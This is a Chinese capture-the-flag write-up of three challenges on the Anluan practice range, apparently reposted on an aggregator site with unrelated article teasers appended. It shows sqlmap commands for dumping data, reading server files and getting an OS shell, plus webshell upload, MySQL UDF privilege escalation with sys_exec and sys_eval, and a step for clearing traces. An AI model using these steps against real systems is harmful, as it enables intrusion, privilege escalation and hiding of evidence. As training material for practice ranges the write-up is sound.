【安鸾靶场】实战渗透

文章目录

  • 前言
  • 一、××租房网 (150分)
  • 二、企业网站 (300分)
  • 三、SQL注入进阶 (550分)


前言

最近看到安鸾的靶场有些比较有意思就打了一下午,有一定难度。

一、××租房网 (150分)

http://106.15.50.112:8031/
在这里插入图片描述
刚打开burp就报了thinkphp的代码执行
在这里插入图片描述

直接getshell
在这里插入图片描述
flag:
在这里插入图片描述

二、企业网站 (300分)

http://106.15.50.112:8035/
打开就看到闪灵cms
在这里插入图片描述
开启sqlmapapi:在这里插入图片描述
去用户界面测试:
在这里插入图片描述
这里注册一个验证码直接空就行:
这里有个注入点:

GET /?type=form&S_id=987181647 HTTP/1.1
Host: 106.15.50.112:8035
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.97 Safari/537.36
Connection: close
Cache-Control: max-age=0

在这里插入图片描述
没跑出来:
在这里插入图片描述
寻找其他注入点:
在这里插入图片描述
那个api跑的慢直接上-r
在这里插入图片描述

在这里插入图片描述
这里有个flag
在这里插入图片描述
sqlmap -r .\test.txt -D scms -T SL_flag -C “flag,id” -dump
在这里插入图片描述

三、SQL注入进阶 (550分)

题目URL:http://106.15.50.112:8023/
提示:flag在服务器根目录

感觉像是sql注入后台上传
在这里插入图片描述
感觉像是伪静态:
在这里插入图片描述
在这里插入图片描述
尝试注入:加*
在这里插入图片描述

在这里插入图片描述
加-dbs参数爆库:
在这里插入图片描述
加–tables爆表:

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述
找一下后台:
在这里插入图片描述
在这里插入图片描述
这里有upload和images:都可以直接访问
在这里插入图片描述
寻找上传点:
在这里插入图片描述

制作图片马上传:
在这里插入图片描述
尝试修改扩展名:(失败)
在这里插入图片描述
限制了后缀
寻找其他点:
在这里插入图片描述
这里又来sql注入加上刚找的就3个注入点了
使用sqlmap获取一下shell
在这里插入图片描述
直接暴力跑路径:
在这里插入图片描述
失败(应该是不是默认的路径)
读取一下apache的配置找找路径:可能存在的路径
/etc/httpd/httpd.conf - 这是一种常见的位置,特别是在使用Red Hat或CentOS等发行版的系统中。
/etc/apache2/httpd.conf - 在使用Debian或Ubuntu等系统时,配置文件可能会位于此位置。
/usr/local/apache2/conf/httpd.conf - 如果安装apache通常会在/usr/local目录下找到它。
/etc/httpd/conf/httpd.conf - 在某些系统中也可以在此位置找到配置文件。

这里是这个路径直接读取:

sqlmap -r .\test.txt  --file-read="/etc/httpd/conf/httpd.conf"

在这里插入图片描述
在这里插入图片描述
直接–os-shell(目录权限不够)
在这里插入图片描述
用upload试试:(权限不够)在这里插入图片描述
试试其他的目录:

在这里插入图片描述
最后images有权限:
在这里插入图片描述

cat看不到,可能是权限问题:
在这里插入图片描述
在这里插入图片描述
可以通过sqlmap上传自己的shell:
sqlmap 会上传自己的马:
在这里插入图片描述

在这里插入图片描述
选择我们的马上传:
在这里插入图片描述
蚁剑上线:
在这里插入图片描述
这里查看flag发现权限不够:
在这里插入图片描述
这是mysql权限:
尝试suid失败,查看内核版本为5.15.0比较高gcc也没有,mysql的用户可以使用udf提权使用mysql的权限:
这里的密码为空:
在这里插入图片描述

查看可导出文件位置

show variables like '%secure%';
这个mysql>5.1版本

这的secure_file_priv为空可以提权
在这里插入图片描述

show variables like 'plugin%'

在这里插入图片描述
在kali中生成so文件上传到plugin目录
在这里插入图片描述

在这里插入图片描述

添加sys_exec和sys_eval函数

create function sys_exec returns string soname 'mysqludf3.so'
create function sys_eval returns string soname 'mysqludf3.so'

在这里插入图片描述

在这里插入图片描述

清除痕迹:
drop function sys_eval;
drop function sys_exec;
在这里插入图片描述
在这里插入图片描述
删除shell:
在这里插入图片描述
可以自己试试。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/95864.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

华为云云耀云服务器L实例评测|基于canal缓存自动更新流程 SpringBoot项目应用案例和源码

前言 最近华为云云耀云服务器L实例上新,也搞了一台来玩,期间遇到各种问题,在解决问题的过程中学到不少和运维相关的知识。 在之前的博客中,介绍过canal的安装和配置,参考博客 拉取创建canal镜像配置相关参数 & …

【Java】HashMap 背诵版

HashMap 背诵版 1. HashMap、Hashtable 和 ConcurrentHashMap 的区别?1.1 线程安全:1.2 继承关系:1.3 允不允许null值: 2. HashMap 的数据结构2.1 什么是hash表?2.2 HashMap 的数据结构 3. 什么是hash冲突,…

1.1.OpenCV技能树--第一单元--OpenCV简介

目录 1.文章内容来源 2.OpenCV简介 3.课后习题代码复现 4.易错点总结与反思 1.文章内容来源 1.题目来源:https://edu.csdn.net/skill/practice/opencv-77f629e4593845b0bf97e74ca8ec95ae/8292?languageopencv&materialId20807 2.资料来源:https://edu.csdn.net/skill…

Go 复合数据类型之结构体与自定义类型

Go 复合数据类型之结构体与自定义类型 文章目录 Go 复合数据类型之结构体与自定义类型一、类型别名和自定义类型1.1 类型定义(Type Definition)简单示例 1.2 类型别名简单示例 1.3 类型定义和类型别名的区别 二、结构体2.1 结构体介绍2.2 结构体的定义2.…

day-65 代码随想录算法训练营(19)图论 part 04

463.岛屿的周长 分析: 1.陆地的旁边是海面,存在周长2.陆地在边界上,存在周长 思路一:深度优先遍历 1.通过记录访问情况来访问数据 class Solution { public:int direct[4][2]{{0,1},{0,-1},{1,0},{-1,0}};int res0;void dfs(…

集群服务器

文章目录 项目名:实现集群服务器技术栈通过这项目你学到(或者复习到)实现功能编码环境json环境muduo库boost库MySql数据库登录mysql:查看mysql服务开启了没有?mysql的服务器及开发包库chat,表 allgroup friend groupuser offlinemessage user…

从零开始学习线性回归:理论、实践与PyTorch实现

文章目录 🥦介绍🥦基本知识🥦代码实现🥦完整代码🥦总结 🥦介绍 线性回归是统计学和机器学习中最简单而强大的算法之一,用于建模和预测连续性数值输出与输入特征之间的关系。本博客将深入探讨线性…

面试题: Spring中Bean的实例化和Bean的初始化有什么区别?

Spring中Bean的实例化和Bean的初始化有什么区别? 背景答案扩展知识什么是实例化什么是初始化 个人评价我的回答 背景 想换工作, 看了图灵周瑜老师的视频想记录一下, 算是学习结果的一个输出. 答案 Spring 在创建一个Bean对象时, 会先创建出一个Java对象, 会通过反射来执行…

Mac上protobuf环境构建-java

参考文献 getting-started 官网pb java介绍 maven protobuf插件 简单入门1 简单入门2 1. protoc编译器下载安装 https://github.com/protocolbuffers/protobuf/releases?page10 放入.zshrc中配置环境变量  ~/IdeaProjects/test2/ protoc --version libprotoc 3.12.1  …

Javascript文件上传

什么是文件上传 文件上传包含两部分, 一部分是选择文件,包含所有相关的界面交互。一部分是网络传输,通过一个网络请求,将文件的数据携带过去,传递到服务器中,剩下的,在服务器中如何存储&#xf…

基于SpringBoot的电影评论网站

目录 前言 一、技术栈 二、系统功能介绍 电影信息管理 电影评论回复 电影信息 用户注册 三、核心代码 1、登录模块 2、文件上传模块 3、代码封装 前言 随着信息技术在管理上越来越深入而广泛的应用,管理信息系统的实施在技术上已逐步成熟。本文介绍了电影评…

Redisson—分布式集合详述

7.1. 映射(Map) 基于Redis的Redisson的分布式映射结构的RMap Java对象实现了java.util.concurrent.ConcurrentMap接口和java.util.Map接口。与HashMap不同的是,RMap保持了元素的插入顺序。该对象的最大容量受Redis限制,最大元素数…

Pyhon-每日一练(1)

🌈write in front🌈 🧸大家好,我是Aileen🧸.希望你看完之后,能对你有所帮助,不足请指正!共同学习交流. 🆔本文由Aileen_0v0🧸 原创 CSDN首发🐒 如…

Vue中如何进行分布式路由配置与管理

Vue中的分布式路由配置与管理 随着现代Web应用程序的复杂性不断增加,分布式路由配置和管理成为了一个重要的主题。Vue.js作为一种流行的前端框架,提供了多种方法来管理Vue应用程序的路由。本文将深入探讨在Vue中如何进行分布式路由配置与管理&#xff0…

OpenWRT、Yocto 、Buildroot和Ubuntu有什么区别

OpenWRT: 用途:OpenWRT 是一个专注于路由器和嵌入式网络设备的Linux发行版。它提供了一个优化的Linux环境,旨在将网络设备变成功能丰富、高度可定制的路由器。 包管理器:OpenWRT 使用 opkg 包管理器,它是一个轻量级的…

Spring Boot中的@Controller使用教程

一 Controller使用方法,如下所示: Controller是SpringBoot里最基本的组件,他的作用是把用户提交来的请求通过对URL的匹配,分配个不同的接收器,再进行处理,然后向用户返回结果。下面通过本文给大家介绍Spr…

linux内核分析:虚拟化

https://www.cnblogs.com/wujuntian/p/16294898.html 三种虚拟化方式 1. 对于虚拟机内核来讲,只要将标志位设为虚拟机状态,我们就可以直接在 CPU 上执行大部分的指令,不需要虚拟化软件在中间转述,除非遇到特别敏感的指令,才需要将标志位设为物理机内核态运行,这样大大…

minio分布式文件存储

基本介绍 什么是 MinIO MinIO 是一款基于 Go 语言的高性能、可扩展、云原生支持、操作简单、开源的分布式对象存储产品。基于 Apache License v2.0 开源协议,虽然轻量,却拥有着不错的性能。它兼容亚马逊S3云存储服务接口。可以很简单的和其他应…

Java方法:重复使用的操作可以写成方法哦

👑专栏内容:Java⛪个人主页:子夜的星的主页💕座右铭:前路未远,步履不停 目录 一、方法的概念1、什么是方法?2、方法的定义3、方法调用的过程 二、方法重载1、重载的概念2、方法签名 在日常生活中…

使用 python 检测泛洪攻击的案例

使用 python 检测泛洪攻击的案例 本案例只使用python标准库通过执行命令来监控异常请求, 并封锁IP, 不涉及其他第三方库工具. import os import time from collections import Counter# 1、update 命令, 采集CPU的平均负载 def get_cpu_load():"""uptime 命令…